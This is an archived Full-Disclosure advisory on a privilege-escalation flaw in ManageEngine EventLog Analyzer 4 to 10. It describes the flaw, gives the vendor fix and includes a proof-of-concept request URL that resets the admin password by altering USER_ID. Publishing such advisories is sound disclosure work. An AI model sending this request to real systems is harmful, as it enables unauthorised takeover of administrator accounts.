lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <d9c8e7310c019f121ee418f9eaca89f8.webmail@localhost> Date: Fri, 29 Jan 2016 16:16:56 -0000 From: graphx@...aint.org Subject: [FD] ManageEngine Eventlog Analyzer v4-v10 Privilege Esacalation # Exploit Title: ManageEngine Eventlog Analyzer Privilege Escalation # Exploit Author: @GraphX # Vendor Homepage:http://www.manageengine.com # Version: 4.0 - 10 1. Description: The manageengine eventlog analyzer fails to properly verify user privileges when making changes via the userManagementForm.do. An unprivileged user would be allowed to make changes to any account by changing the USER_ID field to a number corresponding to another user. Testing discovered that the default admin and guest accounts are 1 and 2. Considering the recent similar vulnerabilities discovered in a more current version of a similar product by ManageEngine, it is possible that more versions of the software including current, are vulnerable. According to the vendor this is fixed in version 10.8. 2) Proof of Concept -login as an unprivileged user -Use the following URL to change the admin password to "admin" http://<IP_ADDRESS>/event/userManagementForm.do?addField=false&action=request.getParameter(&password=admin&email=&USER_ID=1&Submit=Save+User+Details&userName=admin 3 Solution: Upgrade to 10.8 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists